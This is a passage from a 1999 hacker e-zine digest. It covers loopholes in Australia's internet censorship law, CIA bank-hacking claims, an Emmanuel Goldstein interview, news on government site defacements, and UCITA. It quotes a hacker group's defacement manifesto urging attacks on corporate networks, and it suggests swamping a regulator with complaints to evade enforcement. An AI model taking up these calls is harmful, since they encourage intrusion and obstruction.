The thing to note here is the words "immediate circle".
Jumping back up in the document to the definition, we note it refers to the Telecommunications Act of 1997. Jumping to the (rather long) definition in that legislation, we find that your "immediate circle" refers to employees if you are a company:

Immediate circle SECT.

(1) For the purposes of this Act, a person's "immediate circle" consists of the person, together with the following persons: (a) if the person is an individual--an employee of the individual; continued...

In theory, using this aspect of the legislation, you could create a company and employ individuals interested in the banned content you have on offer. Far fetched, but apparently possible. The definition, interestingly, would also allow a University to offer banned content to its employees and students.

Offer on-demand, point-to-point email access to content

In the early days of the commercial internet, before the invention of the World Wide Web, not everybody had access to the FTP sites that contained lots of information. The way most people got around this restriction/limitation was using a service called ftp-by-email. To use it, you'd send an email to a certain address containing a sequence of standard ftp commands, as follows:

From: 2600 Webmaster (webmaster@2600.org.au)
To: FTP-By-Email (ftpmail@ftp.sunet.se)

open mirror.aarnet.edu.au
cd pub/linux/kernel
cd v2.2
binary
get README
quit

Following the receipt of this email, any files you had requested with a "get" command would be emailed back to you. A rundown of how this (still) works can be found here.

Now, referring to the legislation, we find the following definition of "Internet content":

Internet content means information that: (a) is kept on a data storage device; and (b) is accessed, or available for access, using an Internet carriage service; but does not include: (c) ordinary electronic mail; or (d) information that is transmitted in the form of a broadcasting service.

and of "ordinary electronic mail":

ordinary electronic mail does not include a posting to a newsgroup.

Are you thinking what I'm thinking? Assuming the content is not accessible to the public by any means other than point-to-point, user-requested email, you could be very well within the law to offer content that is otherwise banned in any other forum.

Flood the ABA with legitimate, appropriate complaints

I'll start describing this means of evasion by displaying Clause 26. Take particular note of Subclause 26(2b):

26 Investigation of complaints by the ABA

(1) The ABA must investigate a complaint under Division 1.

(2) However, the ABA need not investigate the complaint if: (a) the ABA is satisfied that the complaint is: (i) frivolous; or (ii) vexatious; or (iii) not made in good faith; or (b) the ABA has reason to believe that the complaint was made for the purpose, or for purposes that include the purpose, of frustrating or undermining the effective administration of this Schedule.

(3) The ABA must notify the complainant of the results of such an investigation.

(4) The ABA may terminate such an investigation if it is of the opinion that it does not have sufficient information to conclude the investigation.

Okay, so they thought people might flood them with frivolous complaints... Fair enough. But isn't it the case that every site that is not investigated by the ABA remains unregulated and therefore free? I'm sure you can put two and two together on this one.

Use a "recognised alternative access prevention arrangement"

I'll start this one by displaying two rather lengthy but important subclauses of the legislation, both of which describe possible means to evade content regulation by installing (but presumably not using) one of the currently-available end-user filtering pieces of software.

Firstly Subclause 40(4-7):

40 Action to be taken in relation to a complaint about prohibited content hosted outside Australia

(1) - (3)

Recognised alternative access-prevention arrangements

(4) An Internet service provider is not required to comply with a standard access-prevention notice in relation to a particular end-user if access by the end-user is subject to a recognised alternative access-prevention arrangement (as defined by subclause (5)) that is applicable to the end-user.

(5) The ABA may, by written instrument, declare that a specified arrangement is a recognised alternative access-prevention arrangement for the purposes of the application of this Division to one or more specified end-users if the ABA is satisfied that the arrangement is likely to provide a reasonably effective means of preventing access by those end-users to prohibited content and potential prohibited content.

Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.

(6) The following are examples of arrangements that could be declared to be recognised alternative access-prevention arrangements under subclause (5): (a) an arrangement that involves the use of regularly updated Internet content filtering software; (b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service.

(7) An instrument under subclause (5) is a disallowable instrument for the purposes of section 46A of the Acts Interpretation Act 1901

and Subclause 60(3-8):

60 Matters that must be dealt with by industry codes and industry standards

(1) - (2)

Designated alternative access-prevention arrangements

(3) An industry code or an industry standard may provide that an Internet service provider is not required to deal with Internet content notified under paragraph 40(1)(b) of this Schedule or clause 46 by taking steps to prevent particular end-users from accessing the content if access by the end-users is subject to an arrangement that is declared by the code or standard to be a designated alternative access-prevention arrangement for the purposes of the application of this clause to those end-users.

(4) An industry code developed by a body or association must not declare that a specified arrangement is a designated alternative access-prevention arrangement for the purposes of the application of this clause to one or more specified end-users unless the body or association is satisfied that the arrangement is likely to provide a reasonably effective means of preventing access by those end-users to prohibited content and potential prohibited content.

Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.

(5) An industry standard made by the ABA must not declare that a specified arrangement is a designated alternative access-prevention arrangement for the purposes of the application of this clause to one or more specified end-users unless the ABA is satisfied that the arrangement is likely to provide a reasonably effective means of preventing access by those end-users to prohibited content and potential prohibited content.

Note: For specification by class, see subsection 46(2) of the Acts Interpretation Act 1901.

(6) The following are examples of arrangements that could be declared to be designated alternative access-prevention arrangements: (a) an arrangement that involves the use of regularly updated Internet content filtering software; (b) an arrangement that involves the use of a "family-friendly" filtered Internet carriage service.

(7) For the purposes of this Schedule, if an industry code: (a) deals to any extent with procedures to be followed by Internet service providers in dealing with Internet content notified under paragraph 40(1)(b) of this Schedule or clause 46; and (b) makes provision as mentioned in subclause (3); then: (c) the code is taken to deal with the matter set out in paragraph (2)(d); and (d) the code is taken to be consistent with subclause (2).

(8) For the purposes of this Schedule, if an industry standard: (a) deals to any extent with procedures to be followed by Internet service providers in dealing with Internet content notified under paragraph 40(1)(b) of this Schedule or clause 46; and (b) makes provision as mentioned in subclause (3); then: (c) the standard is taken to deal with the matter set out in paragraph (2)(d); and (d) the standard is taken to be consistent with subclause (2).

Now, if you've made it through all of that, you'll note a single key thing - that subject to appropriate industry codes and standards, it may be possible to have an unfiltered internet feed delivered to you if you have an end-user filtering system installed on your computer. The means of evasion here? Turn the filter off. Not exactly rocket science, is it?

Mirror content so widely as to prevent effective enforcement of the legislation

As with the two previous means of evasion, I will begin by displaying several pieces of the legislation.
First up is Clause 36:

36 Anti-avoidance-special take-down notices

If: (a) an interim take-down notice or a final take-down notice relating to particular Internet content is applicable to a particular Internet content host; and (b) the ABA is satisfied that the Internet content host is hosting in Australia, or is proposing to host in Australia, Internet content (the similar Internet content) that is the same as, or substantially similar to, the Internet content identified in the interim take-down notice or the final take-down notice, as the case may be; and (c) the ABA is satisfied that the similar Internet content is prohibited content or potential prohibited content; the ABA may give the Internet content host a written notice (a special take-down notice) directing the host not to host the similar Internet content at any time when the interim take-down notice or final take-down notice, as the case may be, is in force.

Clause 36 appears to apply to mirrored information or, quite possibly, a website consisting of different layout/text but identical images. I'll now move onto Clauses 46 and 47:

46 Anti-avoidance-notified Internet content

(1) If: (a) particular Internet content has been notified to Internet service providers as mentioned in Paragraph 40(1)(b) of this Schedule; and (b) the notification has not been withdrawn; and (c) the ABA is satisfied that Internet content (the similar Internet content) that is the same as, or substantially similar to, the first-mentioned Internet content is being hosted outside Australia; and (d) the ABA is satisfied that the similar Internet content is prohibited content or potential prohibited content; and (e) a code registered, or standard determined, under Part 5 of this Schedule deals with the matters referred to in subclause 60(2); the ABA must notify the similar Internet content to Internet service providers under the designated notification scheme set out in the code or standard, as the case may be.

(2) If: (a) particular Internet content is notified to Internet service providers as mentioned in Paragraph 40(1)(b) of this Schedule; and (b) as a result of the application of subclause (1) to that content, the ABA notifies similar Internet content to Internet service providers in accordance with subclause (1); and (c) the notification of the first-mentioned content is withdrawn; the notification of the similar Internet content is taken to have been withdrawn.

(3) If: (a) a notification of Internet content is withdrawn under subclause (2); and (b) a code registered, or standard determined, under Part 5 of this Schedule deals with the matters referred to in subclause 60(2); the ABA must notify the withdrawal to Internet service providers under the designated notification scheme set out in the code or standard, as the case may be.

47 Anti-avoidance-special access-prevention notice

(1) If: (a) a standard access-prevention notice relating to particular Internet content is applicable to a particular Internet service provider; and (b) the ABA is satisfied that the Internet service provider is supplying an Internet carriage service that enables end-users to access Internet content (the similar Internet content) that is the same as, or substantially similar to, the Internet content identified in the standard-access prevention notice; and (c) the ABA is satisfied that the similar Internet content is prohibited content or potential prohibited content; the ABA may give the provider a written notice (special access-prevention notice) directing the provider to take all reasonable steps to prevent end-users from accessing the similar Internet content at any time when the standard access-prevention notice is in force.

Note: The ABA may be taken to have given a notice under this clause-see clause 51.

(2) For the purposes of subclause (1), in determining whether particular steps are reasonable, regard must be had to: (a) the technical and commercial feasibility of taking the steps; and (b) the matters set out in subsection 4(3).

(3) Subclause (2) does not, by implication, limit the matters to which regard must be had.

recognised alternative access-prevention arrangements

(4) An Internet service provider is not required to comply with a special access-prevention notice in relation to a particular end-user if access by the end-user is subject to a recognised alternative access-prevention arrangement (as defined by subclause 40(5)) that is applicable to the end-user.

The means of avoidance here would be purely and simply mirroring content so widely and in so many derivative (and possibly dissimilar) forms that even the process of generating take-down notices and notifying internet services providers would bog down the ABA and the OFLC.

Commentary

The intent of this legislation, as stated by the government, was to prevent children accessing "illegal and offensive" material on the Internet. More specifically, they made reference in various forums to pornographic material. My concern is not that responsible adults will be prevented from accessing this material, but that the legislation does not explicitly define what else might be regulated on the whim of a misguided Government minister or influential moral crusader within the ranks of the ABA or OFLC.

One example of what might be banned is the BugTraq mailing list. This list contains "full disclosure" discussions of computer software bugs, including in some cases explicit instructions on how to break into computers. What might be easily overlooked in any such government review of this material is the fact that in most cases, such information is accompanied by further instructions on how to secure any vulnerable computers.
Another oft-quoted example of how an overzealous filter might exclude important content is in the area of health. Breast cancer. Sexually-transmitted diseases. Contraception. If it's got any of the words filtered by Senator Alston's favoured filtering solution, iFilter (a number of them listed here), chances are your friendly neighbourhood ISP will be told to ban it long before you see it.

Conclusion

As you can see, there's a number of loopholes in the legislation that our government has pushed through parliament, and most of them allow a mildly intelligent citizen to quite legally evade any form of content regulation. Far from suggesting that this legislation should be heavier-handed than it already is in restricting people from accessing the information they want, I am suggesting that it should have been thrown out by the Parliament on the basis that it is fundamentally flawed and unenforceable. Instead, and without fear tactics or moralist rhetoric, the Government could have instituted a public education campaign informing parents about the need to restrict unsupervised/unfiltered access to the Internet with young children (5-13) and begin a dialogue about personal responsibility and self moderation with older ones (13 and up). As a young person that has grown up in the midst of computers and communication technologies, I believe this would have achieved a much more productive outcome.

Feedback

Given that this is a layperson's analysis of the legislation, I invite any and all comment from similarly concerned citizens, and in particular citizens familiar with legal matters that may be able to provide further insight. Please feel free to make comments to webmaster@2600.org.au.

@HWA

08.0 Can the CIA break into banks?
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Can CIA Break Into Banks?

contributed by Weld Pond

Last week Newsweek reported that the CIA was planning to electronically break into unnamed banks to get at Slobodan Milosevic's money. How realistic is this?
Is it possible and if so what are the international implications? MSNBC takes a look at these questions and more.

MSNBC
http://www.msnbc.com:80/news/274526.asp
Newsweek
http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm

MSNBC;

Experts argue plan to raid Milosevic’s bank accounts would do more harm than good

By Bob Sullivan
MSNBC

May 28 — It sounded like a Tom Clancy spy novel. Newsweek reported last week that the CIA was planning to tinker with international bank accounts full of Slobodan Milosevic’s money — just another way of getting under the Yugoslav president’s skin. Information warfare experts disagree about the feasibility of such a cyberattack. But there’s little disagreement the U.S. stands to lose much more than it might gain from firing the first volley in such an information war. In fact, some believe damage has already been done.

THE NEWSWEEK STORY RAISED several issues: What international laws would govern a U.S.-backed attack on a bank in a third-party nation? Is such an attack feasible in the first place? What kind of retaliation might U.S. citizens, and their bank accounts, face? But most important, what does even the possibility of such an attack do to the integrity of international banking systems? The story on the cyberattack — fact, fiction or somewhere in between — could already have put the U.S. at risk, said Kawika Daguio, executive vice president of the Financial Information Protection Association. Banking systems hinge on public confidence. You put the money in; you’re confident you’ll be able to take the money out. If there’s any hint you might not be able to get at your money, you’d withdraw it. Any attack on the integrity of a banking system anywhere — particularly when retaliation seems like such an obvious possibility — chips away at public confidence. “It bothers me because we have had conversations with the defense and intelligence community. We thought this was off the table,” Daguio said.
“We’ve had discussions with rather senior policy-makers. We thought they understood the importance of protecting public confidence in the payment system.” But retaliation by foreign agents might be just one source of insecurity for U.S. account holders. There’s another: If the government can and is willing to tinker with foreign accounts, what will stop it from tinkering with mine? Could U.S. agents hijack Milosevic’s money, allegedly stashed away in foreign banks? Yes and no. Experts agree that the CIA has had the know-how to control bank accounts for years, through old-fashioned non-cyber methods, such as coercing bank authorities, or even through legal methods such as freezing accounts. On the other hand, it’s not easy when the target knows what’s coming. According to MSNBC analyst Bill Arkin, the international community, including UNSCOM, is still trying to get its hands on Saddam Hussein’s assets. And such real-world tactics are a far cry from the cyberwar image of a few CIA hackers sitting at a keyboard moving around money thanks to an Internet connection and some wits. There’s disagreement about how possible that might be. “The audits we have performed tell us [banks] are not invulnerable,” says a security expert identifying himself as Space Rogue. Rogue works at L0pht Heavy Industries, which hires out to hack corporate computer systems to test their vulnerability. “Banks have a little more security in place, but that security is still not at a level where it’s unbreakable.” While money systems aren’t connected to the public Internet, “sometimes they have a modem dangling off for remote access, or they use cryptography, but not correctly,” he said. Others suggest cracking a bank that holds Milosevic money — outside the more traditional methods — is nearly impossible. “I deal in probabilities, and I’ve never seen it,” said a man identifying himself as Louis Cipher, a principal investor in Infowar.com.
Cipher is also in charge of security at what he says is the “sixth-largest brokerage in America.” He suggested very few individuals have the skills necessary to “tunnel” from an Internet connection through mainframe systems in banks — in fact, a team of specialists and inside information would be required. “You’d have to be an applications specialist to even navigate to a screen,” he said. “You’re talking well beyond the skills of hackers. It would have to be an insider working with Job Control Language sitting on the mainframe. The only one who would have that ability other than the U.S. government would be organized crime.” And Cipher is skeptical about the U.S. government’s ability to hire and hold the brightest minds in the security industry — since no government agency can match the lure of stock options offered by a high-tech firm. Still, even the possibility of the U.S. using a wired computer to move Milosevic’s money drew swift reaction from information warfare observers. Even hacker groups protested the notion, with a hacker calling himself “sixtoed” setting up a Web page in protest. The reason: Since the U.S. relies more on technology and information than any other nation, it stands to lose the most from such a cyberwar. “I am not one for an information arms race,” said Frank Cilluffo, senior analyst at the Center for Strategic and International Studies in Washington. “We will lose that race.... We’re a hell of a lot more susceptible to retaliation. The defensive implications outweigh the offensive implications.” Anyone can build up an information warfare capability, Cilluffo said. And it’s much more like guerrilla war than nuclear war — it’s easy for the enemy to hide, and there’s no real deterrent. Therefore, retaliation could be swift and indiscriminate. In addition, there is a general principle among security experts suggesting once a system’s security is compromised, it’s much easier to compromise a second time. So the U.S. 
could very well be paving the way for retribution.

WHY NO DENIALS?

Fear of such retaliation attempts, or even the perception of such retaliation attempts, drove Daguio to start calling his friends in the intelligence community to complain as soon as the Newsweek story hit. He has yet to receive the reassurance he was hoping for. “If it’s true or it’s just leaks, it’s bad to have the story out there,” Daguio said. “I have yet to have anyone tell me ‘Don’t worry, everything’s OK.’ ... If they haven’t done anything, the most appropriate thing to do is to come out and say they’re not doing it.” The CIA isn’t doing that; a spokesperson told MSNBC the agency couldn’t comment on its activities, but one source familiar with U.S. intelligence capabilities tells MSNBC to be “very skeptical” of the Newsweek story. Meanwhile, opening the Pandora’s box of cyberwar would lead to a series of yet-to-be answered questions. International law isn’t ready to handle such conflicts, says Cilluffo — so if the U.S. broke into a bank in Cyprus, what laws would govern that act? And could the compromised bank sue the U.S. government? “What are the rules of engagement here?” Cilluffo asked. “What is game, what is not game? This may be a harbinger of how we prosecute and wage war in the future.”

@HWA

09.0 Emmanuel Goldstein Interview
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by cult_hero

Adam Penenberg of Forbes writes a good long article after interviewing the editor of 2600 and the on air personality of "Off the Hook", Emmanuel Goldstein.

Forbes
http://www.forbes.com/penenberg/

RECENTLY, I met with Emmanuel Goldstein, publisher of the hacker zine 2600, at the New York City radio station WBAI. 2600, a slender volume containing articles about hacking, phone phreaking and tips for pirating videogames, has been around since 1984.
Goldstein, a mainstay in the hacker world since he was a teenager, has hosted "Off the Hook," a weekly radio program, for more than ten years. When I asked Goldstein, whose real name is Eric Corley, which name he preferred, his response was, "Call me whatever you want, but the reason I changed it is because I didn't like Eric Corley. The name Emmanuel Goldstein, which comes from a character in Orwell's 1984, suits me much better--and many more people know me as Emmanuel." Goldstein, 39, long, scraggly hair streaked with gray poking out from under a 2600 baseball cap, was enmeshed in hacker culture long before there was an information superhighway. In 1983 he broke into computer systems at NASA, Coca-Cola, Raytheon and the Executive Office of the President of the United States. How was he able to get in? They were all using the same E-mail system, and Goldstein discovered that if he typed the letter "A," he could get the default password, which would allow him to gain access to the system. He then used these companies' mail systems to send E-mail to other hackers. Initially, he was charged with a whopping ten counts of wire fraud, each with a possible sentence of five years. This was the first time, he says, he experienced the government hyping the threat of computer crime. "I freely admitted what I did: It was an offense, but not a crime," Goldstein says. "I showed them what was wrong with their system: "'Don't use the letter 'A' for your default password,'" I told them. "They gave me probation for a year and I had to pay $200 for computer time. Then they let me go." These days, Goldstein spends most of his time working on behalf of his friend, Kevin Mitnick, the hacker poster boy who has been in prison for more than four years for illegally copying and hoarding proprietary software. Goldstein helps run two web sites dedicated to the cause, and is in the process of filming a documentary about Mitnick. 
"There is a lot of fear and paranoia about hackers, and it's not getting any better," he says. "The government needs a threat in order to justify its existence, and we are a convenient scapegoat, since most people really don't understand what we do. They claim that hackers do this and do that, they spread viruses and wreak havoc and destroy systems, and this is hard to dispel." For instance, President Clinton, who has proposed earmarking some $1.5 billion to fight cyberterror threats, said in a January speech at the National Academy of Sciences: "We already are seeing the first wave of deliberate cyber attacks--hackers break into government and business computers, stealing and destroying information, raiding bank accounts, running up credit card charges, extorting money by threats to unleash powerful computer viruses." It sounds like Clinton may have seen too many Keanu Reeves flicks. Most companies that are hacked suffer web site graffiti. This means the victim company is forced to spend money to improve its security. Embarrassing? Certainly. A threat to business? Hardly, and why was the company's security so lax in the first place? While it is true that the Pentagon is hacked nearly every hour, that doesn't mean these teenagers (and that's who most of the hackers who go after "big game" like American military sites are) actually come away with anything. And the part about hackers extorting money by threatening to release nasty computer viruses sounds like it could have been written by Stephen Glass, the former associate editor of The New Republic, who was busted for fabricating stories. Yet, each time the hacker menace is blown out of proportion means the cause of the problem is not addressed.
Law enforcement can either go after the estimated one million hackers out there in cyberspace, most of them being "script kiddies" possessing basic skills at best, or it could insist that companies that release buggy software chock full of security holes take responsibility for the many holes in their products. If you bought a car that could be hijacked with off-the-shelf keys made available over the Internet, you might be tempted to sue the automaker for not doing more to secure the vehicle. Yet, since software companies don't technically sell their products, they "lease" them, they are not liable. If they were, they wouldn't release products that could be so easily penetrated by hackers. But companies like Microsoft have lobbyists. Hackers don't. So don't expect Congress to do much. Goldstein and Mitnick, who to this day is listed as a staff writer on 2600's masthead, became friends in 1989, after Kevin Mitnick's first go around in solitary confinement. (The court, without proof, was afraid that Mitnick could somehow whistle into a telephone and launch nuclear missiles.) While Mitnick, who says he was devastated by his eight months held in a cell no larger than a bathroom, went on the lam from the FBI in the early 1990s, afraid he would be put back in solitary, he called Goldstein almost every day. "The day Kevin was arrested, I'd just missed a phone call from him," Goldstein says. "I was sad he hadn't followed my advice to leave the country. I knew what they would do to him." In the coming months, Takedown, a film based on the book by New York Times reporter John Markoff and Tsutomu Shimomura that details the capture of Kevin Mitnick, is scheduled to come out. Goldstein was able to gain an advance copy of the screenplay and complained bitterly over the evil way Mitnick was portrayed. After Goldstein led a protest outside of Miramax's corporate headquarters, the company made changes to the script. "It's still crap," he says, "but it's more well-rounded crap."
Does Goldstein, who freely admits his hacking skills are modest at best, have any pearls of wisdom to offer about hacking? "The people I hang out with know far more about technology than I do." When dealing with hackers, he cautions, "always assume you're being lied to."

@HWA

10.0 DOD Unplugs From Net as Another Gov Site Gets Hit
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by info-warrior

In a move spokespeople are calling "proactive" (yeah, right) the Department of Defense has announced that it will be pulling its systems off the net to upgrade security and install a firewall. (About damn time.) The White House has also issued a stern warning to would-be crackers saying "You will be caught". Interesting quote from the Washington Post "Securing government Web sites against attack is difficult because the sites are designed for open access." What makes them any more difficult to secure or more open than a corporate web site?

C|Net
http://www.news.com/News/Item/0,4,37257,00.html?owv
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2268574,00.html?chkpt=hpqs014
Washington Post
http://www.washingtonpost.com/wp-srv/national/daily/june99/hackers02.htm

And the War Continues

The latest victim is Brookhaven National Labs. The main web page for the site was defaced late last night by the "Posse". They at least left an interesting message.

HNN Cracked Pages Archive
http://www.hackernews.com/archive/crackarch.html

FBI Crackdown nets 20+ Script Kiddies

The Posse would like to take this opportunity to personally thank the script kiddies who keep throwing themselves at the federal government like insects to a buglight. While you have been keeping the FBI (Federal Bureau Of Instigation) and SS (Secret Cervix) busy tracking down 14 year old hacker hopefuls; we have spent our time burrowing ourselves deep within Corporate America. Ecosystems do not grow without antagonists.
The internet (like it or not) has become a virtual ecosystem that would wither and die were it not for the intervention of hackers. Corporate America has entered this ecosystem like a viral fungus, growing ugly clusters of .com decay, spreading misinformation like wildfire and causing the natural predators to be removed from the ecosystem in which they provide a necessary function. Corporate America must be removed. It's us or them. Take a look at the concrete wastelands that Corporate America has built upon the earth outside your windows. Beneath that concrete there is soil wasted, soil that breeds life. They are trying to do the same thing to the internet. Go outside and try to breathe for just a moment... That stale thickness in the air that Threatens to choke you is the poison spewing from their smokestacks... Did you just cough? The phlegm in your throat are their poisons and do you charge them rent ? Did you charge them storage fees for acting as a receptacle for their toxic waste? They are destroying the world we built to escape the one they have already destroyed! Corporate America will trade 10 years (minimum) of your life in exchange for another $10 in profits. Their poisons, their stifling concrete morgues, their so called "progress"... They never knew the rules, they followed you here to stalk you... To bilk you for $10 they came here because you did. Then when you got in the way of their "progress" they fabricated losses in order to gain FBI attention. They abuse the system and steal your freedoms. Do not blame the FBI, they are playing by the rules... Do not blame the SS, they are playing by the rules... BLAME CORPORATE AMERICA BLAME THE GOVERNMENT BUT QUIT ATTACKING THE FBI AND SECRET SERVICE! YOU ARE PLAYING BY THEIR RULES WHEN YOU DO THIS! A COMPUTER CRIMINAL IS ACCEPTABLE TO SOCIETY THAT IS WHY WE HAVE COMPUTER CRIME LAWS AND PRISONS! ATTACK CORPORATE AMERICA... THE RACE BEGINS... NO MORE .COM'S ON THE INTERNET BY Y2K. SEIZE THE BACKBONES! 
THEY BELONG To YOU! CONTROL THE MEDIUMS BY WHICH THESE CORPORATE IDIOTS DO BUSINESS. H4ppy Th4nksg1v1ng Turk3yz, The P0sse. Greets out 2: Gary Dell'Abate, Scott Charney, Gale Thackeray, Terry Atchley, Kurt Von Brauch, Don Delaney, Chris Goggans Tsutomu Shimomoura, Justin Tanner Peterson, John Markhoff, John Perry Barlow, Netta Gilboa, Corey Braun, Peter "HFG" Shipley, Berferd, Dan Farmer, Wietse Venema, Dale Drew, Joshua Quittner, Stephanie Hanna, Joe Cuervo and Jim Beam. Kick in the colostomy bag out 2: gH, Eric Burns, mosthated, mindphasr, Kevin Mitnick, Kevin Poulsen, Phiber Optik, John Draper, Emmanuel Goldstein, SOB!, 9X, EL8, #pascal, team spl0it, attrition.org, Kit Knox, b4b0, AntiOnline, HackerNews.com, Zo0mer, mozy, m1crochip, in0de, #bolo, Red Knight, slack packet, Israeli Ghost, infam0us, f0rpaxe, HFX international, kimmy, Rosie O'Donell and all K-MART employees. C|Net; White House threatens to punish hackers By Reuters Special to CNET News.com June 1, 1999, 3:35 p.m. PT WASHINGTON--Annoyed by a recent wave of attacks against official U.S. government Web sites, the White House today warned hackers who target federal Web sites that they will be caught and punished. "There's a government-wide effort to make sure that our computer systems remain secure," White House Press Secretary Joe Lockhart said in a briefing. "For those who think that this is some sort of sport, I think [it will be] less fun when the authorities do catch up with them...and these people are prosecuted," he said. To protect against attacks that in recent days and weeks have disabled sites run by the Energy Department, the FBI, the Senate, the Interior Department, and the White House, the Defense Department said it planned to shut down its Web site for a short time today, said Ken Bacon, the Pentagon's chief spokesman. "This is much more protective than reactive," Bacon said. 
"It's looking to the future to prevent the types of problems that the other agencies" have experienced in recent weeks on their sites, he said. Attacking U.S. government Web sites is becoming an increasingly popular tool of people angry with the Clinton administration and its agencies. Last week hackers responded to a six-state FBI sweep of about 20 suspected hackers by attacking several government Internet locations, forcing the FBI, the Interior Department, and the U.S. Senate to temporarily shut down their Web sites. After NATO jets hit the Chinese Embassy in Belgrade in May, hackers from China attacked a handful of U.S. government sites, including one maintained by the Energy Department. In an unrelated incident, the official White House site was shut down briefly because of an attempt to tamper with it by unidentified hackers, officials said. In recent years the Justice Department's site was shut down once by hackers who put Nazi swastikas on its home page, and hackers forced the CIA to shut down its site after they changed the name from "Central Intelligence Agency" to "Central Stupidity Agency." With many U.S. government sites under attack, computer security experts are bracing for what could be a month full of additional Internet hacking incidents. Supporters of Kevin Mitnick, a hacker jailed in Los Angeles since February 1995, will demonstrate in 14 U.S. cities Friday, seeking his release to a halfway house and an easy probation when he is sentenced on June 14. Mitnick, 35, pleaded guilty on March 26 to seven counts of wire fraud, computer fraud, and illegal interception of a wire communication. Federal officials said he impersonated an employee of Finland-based Nokia Mobile Phones to steal software worth $240,000. He also stole software from Motorola, Novell, Fujitsu Network Transmission Systems, and Sun Microsystems, federal officials said. 
Supporters of Mitnick say the four years Mitnick has spent in jail awaiting trial is a harsher term than for many people convicted of violent crimes like robbery and assault. Their protest Friday will be seeking a more lenient sentence. The U.S. attorney for the Central District of California said Mitnick will be sentenced to 46 months in prison on June 14 as part of his plea bargain agreement with the government. Mitnick, whose exploits as a hacker inspired an upcoming Hollywood movie, also will be obliged to pay the victims of his crimes from any profits he makes from books or movies about his life, a spokesman for the U.S. attorney's office said. While hacking incidents may not be part of Friday's nationwide protest, there may be a surge in attacks across the Internet if Mitnick's sentence is perceived as too stiff, said John Vranesevich, the founder and director of AntiOnline. "Hackers attack when they're mad about something. The demonstration Friday will be an attempt to educate," said Vranesevich. "However, if Kevin Mitnick is put in jail, there very well could be more attacks after that." Still, other experts said Internet sites should upgrade their security against possible attack before Friday. "Given the timing, it probably would be a good idea to be more on guard than usual," said Jevon Jaconi, the district attorney of Kewaunee County, Wisconsin, and an expert in the developing field of cyberspace law. Between 70 percent and 80 percent of all Internet hacking attacks come on systems that have not updated their security codes, routinely sent by computer manufacturers and network administrators, Jaconi said. The best way to prevent hacking attacks in the future is to heed those security warnings and implement the needed changes, he said. 
Washington Post; Online Security Is Pentagon's Latest Battle By John Schwartz Washington Post Staff Writer Wednesday, June 2, 1999; Page A2 The Department of Defense announced yesterday that it was briefly pulling its computers off the Internet to upgrade security by installing hardier "firewall" protection between computer systems that are accessible to the outside world and those that should not be. Noting the recent spate of hacker attacks on government Web sites, Pentagon spokesman Kenneth Bacon said the upgrade is part of a long-term computer security effort: "This is much more protective than reactive." In fact, the Defense Department is engaged in long-term planning that could completely move its unclassified networks off the Internet and on to a proprietary system. The GNIE project (Global Network Information Enterprise, pronounced "genie") will unveil this major proposal this summer, said DOD spokeswoman Susan Hansen. "A lot of systems over the years have been patched together," she said, and "of course, you're only as strong as your weakest link." Skirmishes between federal law enforcement officials and computer intruders have been intensifying in recent weeks. Hackers angered by about 20 recent FBI raids on suspected members of the loose-knit computer underground have launched a variety of attacks on Web sites maintained by the FBI, the Senate, the Interior Department and the White House. "For those who do this for whatever kind of sport it provides them, they'll be found, and they'll be prosecuted," White House press secretary Joe Lockhart said yesterday. Securing government Web sites against attack is difficult because the sites are designed for open access; that's why security-conscious computer managers separate Web computer systems from those that contain critical internal information. 
In the case of the FBI computer intrusions, for example, "these are not the internal systems that contain classified or top-secret information," said Justice Department spokeswoman Carole Florman. "Those systems have not been at risk, and they have not been compromised." Instead, she said, the attacked sites are "the FBI's vehicle for communicating with the public. . . . What they are really doing is denying access to the American public to the information available on that Web site." FBI agents across the country have been focusing on a gang that calls itself "Global Hell." The agents appear to be going after leading members of the group and some peripheral figures, hoping to find bigger players, said John Vranesevich, founder of antionline.com, a Web site that tracks hacker activity. Vranesevich called the hacker response "a tantrum," saying that "many of them are now realizing for the first time that everything they've been doing for the past few months [has] been watched." Those targeted by the raids say that the agents are casting a very broad net. Paul Maidman, 18, was asleep when FBI agents entered his apartment. The New Jersey teen's mother had already left for work for the day when a half-dozen armed agents grabbed Maidman's computer and began hours of questioning. Noting that he has no relationship with Global Hell but that he has sat in on Internet chats where its members have congregated, Maidman said, "I'm not really counting on getting it [the computer] back any time soon." He added that he has shied away from computer mischief since he turned 18. Maidman said that while the experience with the government agents was intimidating, "they were actually really nice." When his 12-year-old sister woke up, "they made her waffles," he said. Experts in computer crime said the government reaction constitutes just the latest wave of law enforcement efforts to curtail computer mischief. 
"It's immensely foolish of the hacker underground to step up its assaults on law enforcement sites," said Michael Godwin, author of the book "Cyber Rights." "These two cultures regard each other with such deep antagonism and distrust that you might have to call in [veteran diplomat] Richard Holbrooke to sort it out," Godwin said.

© Copyright 1999 The Washington Post Company

@HWA

11.0 UCITA About to be Approved
     ~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Ryan.Russell

The Uniform Computer Information Transactions Act is about to be approved. This draconian act will give vendors the right to repossess software by disabling it remotely (meaning you have to leave a port open on the firewall? Just imagine the DoS possibilities.); prevent the transfer of licenses from one party to another without vendor permission (Does this include my copy of LoadRunner for the Atari2600 that I sold for $5?); outlaw reverse engineering (Whoa, no more third party security analysis). This new law is being supported by such software giants as Microsoft, Adobe, and WinPro. The proposed legislation is set to go before the National Conference of Commissioners on Uniform State Laws in July. If this panel approves this measure it will then be sent to state legislations around the country. (Good way to bypass the feds.)

InfoWorld
http://www.infoworld.com/cgi-bin/displayStory.pl?/features/990531ucita.htm
National Conference of Commissioners on Uniform State Laws
http://www.2bguide.com/docs/040799pr.html

InfoWorld;

Licensing time bomb

Software-law dispute explodes as enactment draws near

By Jessica Davis

Imagine the horror of walking into work one day to find your software vendor holding your company hostage by threatening to shut down your mission-critical systems unless you concede to its terms. Sounds illegal, right? Perhaps not.
Although many IT professionals are unaware of it, that practice will become legally defensible if new legislation called the Uniform Computer Information Transactions Act, or UCITA, is approved. UCITA is a proposed law for applying consistent rules to computer software licenses across all 50 states. It would

